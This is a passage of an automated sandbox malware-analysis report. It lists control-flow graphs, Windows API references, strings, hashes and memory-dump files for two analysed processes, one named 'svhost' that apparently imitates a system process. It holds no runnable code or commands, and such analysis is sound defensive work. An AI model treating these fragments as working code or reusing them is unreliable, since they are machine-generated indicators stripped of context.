                                                            • Instruction Fuzzy Hash: 60029D2291DB8285E720CF19E8553AA77A0FB857A8F504235DAEC877E9EF7CD145CB00

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,?,?,00007FF6F1FBD3B0,00007FF6F1FBD3B0,?,?,00007FF6F1FB0000,?,00007FF6F1FB1991), ref: 00007FF6F1FB1C63
                                                            • VirtualProtect.KERNEL32(?,?,?,?,00007FF6F1FBD3B0,00007FF6F1FBD3B0,?,?,00007FF6F1FB0000,?,00007FF6F1FB1991), ref: 00007FF6F1FB1CC7
                                                            • memcpy.MSVCRT ref: 00007FF6F1FB1CE0
                                                            • GetLastError.KERNEL32(?,?,?,?,00007FF6F1FBD3B0,00007FF6F1FBD3B0,?,?,00007FF6F1FB0000,?,00007FF6F1FB1991), ref: 00007FF6F1FB1D23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                            • API String ID: 2595394609-2123141913
                                                            • Opcode ID: f71d7c17d8efb8792bd36a77065ce856a453be169e7440349e6f230ab35daf72
                                                            • Instruction ID: fad6f3fd6b6a0364e32e1aaf27eb82d197e901acfd0d766fb80e608015ca8e62
                                                            • Opcode Fuzzy Hash: f71d7c17d8efb8792bd36a77065ce856a453be169e7440349e6f230ab35daf72
                                                            • Instruction Fuzzy Hash: 674158A1E0EA4781EB11DB02E8586B827E0FB84BE8F544532CA6DC36E1EF3CE545C700

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                            • String ID:
                                                            • API String ID: 3326252324-0
                                                            • Opcode ID: 30ded24aebec5e3133582754e9744752ca6952f0633bd4de7137b6fa68abc3ee
                                                            • Instruction ID: 9b1eee4995364f677000dabb61ce8ab94e46c48e1360d891537e0cf07a365544
                                                            • Opcode Fuzzy Hash: 30ded24aebec5e3133582754e9744752ca6952f0633bd4de7137b6fa68abc3ee
                                                            • Instruction Fuzzy Hash: 4921C725E1A94781FB59DB01EA6527922A0BF44BE4F540235C97DCB6E4FFACBC468700

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 329 7ff6f1fb1e10-7ff6f1fb1e2d 330 7ff6f1fb1e3e-7ff6f1fb1e48 329->330 331 7ff6f1fb1e2f-7ff6f1fb1e38 329->331 333 7ff6f1fb1ea3-7ff6f1fb1ea8 330->333 334 7ff6f1fb1e4a-7ff6f1fb1e53 330->334 331->330 332 7ff6f1fb1f60-7ff6f1fb1f69 331->332 333->332 337 7ff6f1fb1eae-7ff6f1fb1eb3 333->337 335 7ff6f1fb1e55-7ff6f1fb1e60 334->335 336 7ff6f1fb1ecc-7ff6f1fb1ed1 334->336 335->333 340 7ff6f1fb1f23-7ff6f1fb1f2d 336->340 341 7ff6f1fb1ed3-7ff6f1fb1ee2 signal 336->341 338 7ff6f1fb1eb5-7ff6f1fb1eba 337->338 339 7ff6f1fb1efb-7ff6f1fb1f0a call 7ff6f1fba500 337->339 338->332 344 7ff6f1fb1ec0 338->344 339->340 350 7ff6f1fb1f0c-7ff6f1fb1f10 339->350 342 7ff6f1fb1f2f-7ff6f1fb1f3f 340->342 343 7ff6f1fb1f43-7ff6f1fb1f45 340->343 341->340 345 7ff6f1fb1ee4-7ff6f1fb1ee8 341->345 351 7ff6f1fb1f5a 342->351 343->332 344->340 348 7ff6f1fb1f4e-7ff6f1fb1f53 345->348 349 7ff6f1fb1eea-7ff6f1fb1ef9 signal 345->349 348->351 349->332 352 7ff6f1fb1f55 350->352 353 7ff6f1fb1f12-7ff6f1fb1f21 signal 350->353 351->332 352->351 353->332 353->340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CCG
                                                            • API String ID: 0-1584390748
                                                            • Opcode ID: aac3cff987aa207af6683fbdf05d97adeeaddfa67e5404ea55e0566f274569b7
                                                            • Instruction ID: cae7de0ad6ae88e038b38b9cddd298ccd70ebecdeaef6e0fdf1aaf0217d80490
                                                            • Opcode Fuzzy Hash: aac3cff987aa207af6683fbdf05d97adeeaddfa67e5404ea55e0566f274569b7
                                                            • Instruction Fuzzy Hash: BF212721E0E10741FB75D615A9903B911C1AF987F8F258535DA2DC72D4FF6CA982C240

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: wcslen
                                                            • String ID: 0$@
                                                            • API String ID: 4088430540-1545510068
                                                            • Opcode ID: ef7ed66185c074b667720f16183e97d9ab3fb1e6636ca8cac5f9c7ec846e676b
                                                            • Instruction ID: b1cbf3f3fed3c82ec28eaf874fe3f141fdbd6363bb586d138124f0e8c8773ad3
                                                            • Opcode Fuzzy Hash: ef7ed66185c074b667720f16183e97d9ab3fb1e6636ca8cac5f9c7ec846e676b
                                                            • Instruction Fuzzy Hash: 5C113A2252C68186E361DB14F44679AB7B4FFD43A8F505125FA8D83BA8EF7DD14ACB00

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 362 7ff6f1fb1880-7ff6f1fb189c 363 7ff6f1fb1a0f-7ff6f1fb1a1f 362->363 364 7ff6f1fb18a2-7ff6f1fb18f9 call 7ff6f1fb2420 call 7ff6f1fb2660 362->364 364->363 369 7ff6f1fb18ff-7ff6f1fb1910 364->369 370 7ff6f1fb193e-7ff6f1fb1941 369->370 371 7ff6f1fb1912-7ff6f1fb191c 369->371 373 7ff6f1fb194d-7ff6f1fb1954 370->373 374 7ff6f1fb1943-7ff6f1fb1947 370->374 372 7ff6f1fb191e-7ff6f1fb1929 371->372 371->373 372->373 375 7ff6f1fb192b-7ff6f1fb193a 372->375 377 7ff6f1fb199e-7ff6f1fb19a6 373->377 378 7ff6f1fb1956-7ff6f1fb1961 373->378 374->373 376 7ff6f1fb1a20-7ff6f1fb1a26 374->376 375->370 379 7ff6f1fb1b87-7ff6f1fb1b98 call 7ff6f1fb1d40 376->379 380 7ff6f1fb1a2c-7ff6f1fb1a37 376->380 377->363 381 7ff6f1fb19a8-7ff6f1fb19c1 377->381 382 7ff6f1fb1970-7ff6f1fb199c call 7ff6f1fb1ba0 378->382 380->377 383 7ff6f1fb1a3d-7ff6f1fb1a5f 380->383 384 7ff6f1fb19df-7ff6f1fb19e7 381->384 382->377 387 7ff6f1fb1a7d-7ff6f1fb1a97 383->387 389 7ff6f1fb19d0-7ff6f1fb19dd 384->389 390 7ff6f1fb19e9-7ff6f1fb1a0d VirtualProtect 384->390 392 7ff6f1fb1b74-7ff6f1fb1b82 call 7ff6f1fb1d40 387->392 393 7ff6f1fb1a9d-7ff6f1fb1afa 387->393 389->363 389->384 390->389 392->379 399 7ff6f1fb1b22-7ff6f1fb1b26 393->399 400 7ff6f1fb1afc-7ff6f1fb1b0e 393->400 403 7ff6f1fb1a70-7ff6f1fb1a77 399->403 404 7ff6f1fb1b2c-7ff6f1fb1b30 399->404 401 7ff6f1fb1b10-7ff6f1fb1b20 400->401 402 7ff6f1fb1b5c-7ff6f1fb1b6c 400->402 401->399 401->402 402->392 405 7ff6f1fb1b6f call 7ff6f1fb1d40 402->405 403->377 403->387 404->403 406 7ff6f1fb1b36-7ff6f1fb1b53 call 7ff6f1fb1ba0 404->406 405->392 406->402
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F1FB1247), ref: 00007FF6F1FB19F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                            • API String ID: 544645111-395989641
                                                            • Opcode ID: 6188dcfb9ba409927f7d43b305952e2ca18d87eecd447261aab3e5aaa2c983f9
                                                            • Instruction ID: 0266a26777ab0ed45d7de0e0c767879ac52fc77fedc1eb283a930a9e682731fd
                                                            • Opcode Fuzzy Hash: 6188dcfb9ba409927f7d43b305952e2ca18d87eecd447261aab3e5aaa2c983f9
                                                            • Instruction Fuzzy Hash: B3514B35E0A547C6EB10CB22E8456B827A1BB04BE8F484131D97D877E4EF7CE996C700

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 409 7ff6f1fb1800-7ff6f1fb1810 410 7ff6f1fb1824 409->410 411 7ff6f1fb1812-7ff6f1fb1822 409->411 412 7ff6f1fb182b-7ff6f1fb1867 call 7ff6f1fb2290 fprintf 410->412 411->412
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: fprintf
                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                            • API String ID: 383729395-3474627141
                                                            • Opcode ID: d196cce22733da6664e8edb65b95f02763a682be6f02ab55e526d30871c6c29c
                                                            • Instruction ID: 77ea13b6c2d0dfb4b526a751cbd252bbe2c18c1760117da614c14d192417af2c
                                                            • Opcode Fuzzy Hash: d196cce22733da6664e8edb65b95f02763a682be6f02ab55e526d30871c6c29c
                                                            • Instruction Fuzzy Hash: 44F0C221E1EA4682E321EB24A9410B963A0FB493E5F809235DE5DD3291EF2CF1828300

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2224666564.00007FF6F1FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1FB0000, based on PE: true
                                                            • Associated: 00000000.00000002.2224627275.00007FF6F1FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224693790.00007FF6F1FBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224717932.00007FF6F1FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2224744703.00007FF6F1FBF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225019999.00007FF6F223B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225045686.00007FF6F223D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2225066265.00007FF6F2240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff6f1fb0000_prog.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                            • String ID:
                                                            • API String ID: 682475483-0
                                                            • Opcode ID: 0d3f40a56fc230f51008cd68afb882d42e2fa9fd450aedc21c851e2dc6c825f8
                                                            • Instruction ID: b634974133c8955672c9e678fd87843e9f5eb0b755524916624dac39170079e2
                                                            • Opcode Fuzzy Hash: 0d3f40a56fc230f51008cd68afb882d42e2fa9fd450aedc21c851e2dc6c825f8
                                                            • Instruction Fuzzy Hash: 80011625E0A64381F74ADB01AE1427822A0BF04BE4F540135CA2DC76E0FF7CF8958200

                                                            Execution Graph

                                                            Execution Coverage:4.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:184
                                                            Total number of Limit Nodes:2
                                                            execution_graph 1140 7ff7e32f1394 1144 7ff7e32f9f40 1140->1144 1142 7ff7e32f13b8 1143 7ff7e32f13c6 NtAllocateUserPhysicalPagesEx 1142->1143 1145 7ff7e32f9f5e 1144->1145 1148 7ff7e32f9f8b 1144->1148 1145->1142 1146 7ff7e32fa033 1147 7ff7e32fa04f malloc 1146->1147 1149 7ff7e32fa070 1147->1149 1148->1145 1148->1146 1149->1145 1180 7ff7e32f2050 1181 7ff7e32f20cf 1180->1181 1182 7ff7e32f205e EnterCriticalSection 1180->1182 1183 7ff7e32f20c2 LeaveCriticalSection 1182->1183 1184 7ff7e32f2079 1182->1184 1183->1181 1184->1183 1185 7ff7e32f20bd free 1184->1185 1185->1183 1405 7ff7e32f1fd0 1406 7ff7e32f1fe4 1405->1406 1407 7ff7e32f2033 1405->1407 1406->1407 1408 7ff7e32f1ffd EnterCriticalSection LeaveCriticalSection 1406->1408 1408->1407 1433 7ff7e32f1e10 1434 7ff7e32f1e2f 1433->1434 1435 7ff7e32f1ecc 1434->1435 1438 7ff7e32f1eb5 1434->1438 1440 7ff7e32f1e55 1434->1440 1436 7ff7e32f1ed3 signal 1435->1436 1435->1438 1437 7ff7e32f1ee4 1436->1437 1436->1438 1437->1438 1439 7ff7e32f1eea signal 1437->1439 1439->1438 1440->1438 1441 7ff7e32f1f12 signal 1440->1441 1441->1438 1186 7ff7e32f154e 1188 7ff7e32f1394 1186->1188 1189 7ff7e32f9f40 malloc 1188->1189 1190 7ff7e32f13b8 1189->1190 1191 7ff7e32f13c6 NtAllocateUserPhysicalPagesEx 1190->1191 1261 7ff7e32f118b 1262 7ff7e32f1190 1261->1262 1263 7ff7e32f11b9 _amsg_exit 1261->1263 1262->1263 1264 7ff7e32f11a0 Sleep 1262->1264 1266 7ff7e32f11fa 1263->1266 1264->1262 1264->1263 1267 7ff7e32f1201 _initterm 1266->1267 1268 7ff7e32f121a 1266->1268 1267->1268 1269 7ff7e32f1880 5 API calls 1268->1269 1270 7ff7e32f1247 SetUnhandledExceptionFilter 1269->1270 1271 7ff7e32f126a 1270->1271 1272 7ff7e32f126f malloc 1271->1272 1273 7ff7e32f128b 1272->1273 1274 7ff7e32f12a0 strlen malloc memcpy 1273->1274 1274->1274 1275 7ff7e32f12d0 1274->1275 1276 7ff7e32f132d _cexit 1275->1276 1277 7ff7e32f1338 1275->1277 1276->1277 1282 7ff7e32f2f88 1285 7ff7e32f14a9 1282->1285 1286 7ff7e32f1394 2 API calls 1285->1286 1287 7ff7e32f6585 1290 7ff7e32f2df0 1287->1290 1302 7ff7e32f2660 1290->1302 1292 7ff7e32f2e00 memset 1297 7ff7e32f2e3c 1292->1297 1304 7ff7e32f2690 1297->1304 1303 7ff7e32f266f 1302->1303 1303->1292 1303->1303 1341 7ff7e32f155d 1304->1341 1342 7ff7e32f1394 2 API calls 1341->1342 1409 7ff7e32f1ac3 1410 7ff7e32f1ade 1409->1410 1411 7ff7e32f199e 1410->1411 1412 7ff7e32f1b36 1410->1412 1415 7ff7e32f1a0f 1410->1415 1411->1415 1416 7ff7e32f19e9 VirtualProtect 1411->1416 1413 7ff7e32f1ba0 4 API calls 1412->1413 1414 7ff7e32f1b53 1413->1414 1416->1411 1442 7ff7e32f2104 1443 7ff7e32f2111 EnterCriticalSection 1442->1443 1444 7ff7e32f2218 1442->1444 1446 7ff7e32f220b LeaveCriticalSection 1443->1446 1450 7ff7e32f212e 1443->1450 1445 7ff7e32f2272 1444->1445 1447 7ff7e32f2241 DeleteCriticalSection 1444->1447 1449 7ff7e32f2230 free 1444->1449 1446->1444 1447->1445 1448 7ff7e32f214d TlsGetValue GetLastError 1448->1450 1449->1447 1449->1449 1450->1446 1450->1448 1451 7ff7e32f1404 1452 7ff7e32f1394 2 API calls 1451->1452 1197 7ff7e32f1440 1198 7ff7e32f1394 2 API calls 1197->1198 1199 7ff7e32f144f 1198->1199 1200 7ff7e32f1394 2 API calls 1199->1200 1453 7ff7e32f1800 1454 7ff7e32f1812 1453->1454 1455 7ff7e32f1835 fprintf 1454->1455 1456 7ff7e32f1000 1457 7ff7e32f108b __set_app_type 1456->1457 1458 7ff7e32f1040 1456->1458 1459 7ff7e32f10b6 1457->1459 1458->1457 1460 7ff7e32f10e5 1459->1460 1462 7ff7e32f1e00 1459->1462 1463 7ff7e32fa4f0 __setusermatherr 1462->1463 1417 7ff7e32f1ab3 1418 7ff7e32f1ade 1417->1418 1419 7ff7e32f1b36 1418->1419 1421 7ff7e32f199e 1418->1421 1423 7ff7e32f1a0f 1418->1423 1420 7ff7e32f1ba0 4 API calls 1419->1420 1424 7ff7e32f1b53 1420->1424 1422 7ff7e32f19e9 VirtualProtect 1421->1422 1421->1423 1422->1421 1424->1424 1343 7ff7e32f216f 1344 7ff7e32f2185 1343->1344 1345 7ff7e32f2178 InitializeCriticalSection 1343->1345 1345->1344 1346 7ff7e32f1a70 1347 7ff7e32f199e 1346->1347 1349 7ff7e32f1a7d 1346->1349 1348 7ff7e32f1a0f 1347->1348 1350 7ff7e32f19e9 VirtualProtect 1347->1350 1350->1347 1203 7ff7e32f6628 1205 7ff7e32f6635 1203->1205 1204 7ff7e32f6792 wcslen 1206 7ff7e32f67a8 1204->1206 1211 7ff7e32f67ec 1204->1211 1205->1204 1207 7ff7e32f67c0 _wcsnicmp 1206->1207 1208 7ff7e32f67d6 wcslen 1207->1208 1207->1211 1208->1207 1208->1211 1209 7ff7e32f6959 memset wcscpy wcscat 1210 7ff7e32f69ad 1209->1210 1235 7ff7e32f3350 memset 1210->1235 1211->1209 1236 7ff7e32f35c1 memset 1235->1236 1246 7ff7e32f33c3 1235->1246 1238 7ff7e32f35e6 1236->1238 1237 7ff7e32f362b wcscpy wcscat wcslen 1240 7ff7e32f1422 2 API calls 1237->1240 1238->1237 1239 7ff7e32f343a memset 1239->1246 1242 7ff7e32f3728 1240->1242 1241 7ff7e32f3493 wcscpy wcscat wcslen 1253 7ff7e32f1422 1241->1253 1244 7ff7e32f3767 1242->1244 1257 7ff7e32f1431 1242->1257 1251 7ff7e32f14c7 1244->1251 1246->1236 1246->1239 1246->1241 1250 7ff7e32f3579 1246->1250 1255 7ff7e32f145e 1246->1255 1250->1236 1252 7ff7e32f1394 2 API calls 1251->1252 1254 7ff7e32f1394 2 API calls 1253->1254 1256 7ff7e32f1394 2 API calls 1255->1256 1258 7ff7e32f1394 2 API calls 1257->1258 1355 7ff7e32f1e65 1356 7ff7e32f1e67 signal 1355->1356 1357 7ff7e32f1e7c 1356->1357 1358 7ff7e32f1e99 1356->1358 1357->1358 1359 7ff7e32f1e82 signal 1357->1359 1359->1358 1472 7ff7e32f15e4 1473 7ff7e32f1394 2 API calls 1472->1473 1474 7ff7e32f15f3 1473->1474 1259 7ff7e32f2320 strlen 1260 7ff7e32f2337 1259->1260 1475 7ff7e32f38e0 wcslen 1483 7ff7e32f157b 1475->1483 1484 7ff7e32f1394 2 API calls 1483->1484 1427 7ff7e32f219e 1428 7ff7e32f2272 1427->1428 1429 7ff7e32f21ab EnterCriticalSection 1427->1429 1430 7ff7e32f2265 LeaveCriticalSection 1429->1430 1432 7ff7e32f21c8 1429->1432 1430->1428 1431 7ff7e32f21e9 TlsGetValue GetLastError 1431->1432 1432->1430 1432->1431 1150 7ff7e32f11d8 1151 7ff7e32f11fa 1150->1151 1152 7ff7e32f1201 _initterm 1151->1152 1153 7ff7e32f121a 1151->1153 1152->1153 1163 7ff7e32f1880 1153->1163 1155 7ff7e32f1247 SetUnhandledExceptionFilter 1156 7ff7e32f126a 1155->1156 1157 7ff7e32f126f malloc 1156->1157 1158 7ff7e32f128b 1157->1158 1159 7ff7e32f12a0 strlen malloc memcpy 1158->1159 1159->1159 1160 7ff7e32f12d0 1159->1160 1161 7ff7e32f132d _cexit 1160->1161 1162 7ff7e32f1338 1160->1162 1161->1162 1164 7ff7e32f18a2 1163->1164 1168 7ff7e32f1a0f 1163->1168 1165 7ff7e32f1956 1164->1165 1166 7ff7e32f199e 1164->1166 1164->1168 1165->1166 1170 7ff7e32f1ba0 1165->1170 1166->1168 1169 7ff7e32f19e9 VirtualProtect 1166->1169 1168->1155 1169->1166 1173 7ff7e32f1bc2 1170->1173 1171 7ff7e32f1c04 memcpy 1171->1165 1173->1171 1174 7ff7e32f1c45 VirtualQuery 1173->1174 1175 7ff7e32f1cf4 1173->1175 1174->1175 1179 7ff7e32f1c72 1174->1179 1176 7ff7e32f1d23 GetLastError 1175->1176 1177 7ff7e32f1d37 1176->1177 1178 7ff7e32f1ca4 VirtualProtect 1178->1171 1178->1176 1179->1171 1179->1178

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                            • String ID: &$;*
                                                            • API String ID: 2643109117-510990765
                                                            • Opcode ID: f214d2cb23ad4a7d8a6f2e16a4dc08a5006247cdfdc4fc33eaf7806aa3e5334d
                                                            • Instruction ID: 0621b66357c16ae95237b71de1d01896b3067d3fe2f2a2c5e32d646f8df6a3ea
                                                            • Opcode Fuzzy Hash: f214d2cb23ad4a7d8a6f2e16a4dc08a5006247cdfdc4fc33eaf7806aa3e5334d
                                                            • Instruction Fuzzy Hash: 6F416D31E0968685F7C0BB25E954379ABA9AF84780FC44037C98E737A1DE3DF4619722

                                                            Control-flow Graph

                                                            APIs
                                                            • NtAllocateUserPhysicalPagesEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E32F1156), ref: 00007FF7E32F13F7
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.2341812331.00007FF7E32F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E32F0000, based on PE: true
                                                            • Associated: 00000023.00000002.2341768752.00007FF7E32F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341857755.00007FF7E32FB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2341885327.00007FF7E32FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342095652.00007FF7E357D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000023.00000002.2342114716.00007FF7E3580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ff7e32f0000_svhost.jbxd
                                                            Similarity
                                                            • API ID: AllocatePagesPhysicalUser
                                                            • String ID:
                                                            • API String ID: 889254806-0
                                                            • Opcode ID: 59d44b6da759f21b666a868a4e6a88dd90aa5652e3e5bdc8205d5884860000a3
                                                            • Instruction ID: 057e3070e600fe89979ce83345b0a02ec157209caf7c8bf441fc746ef050681a
                                                            • Opcode Fuzzy Hash: 59d44b6da759f21b666a868a4e6a88dd90aa5652e3e5bdc8205d5884860000a3
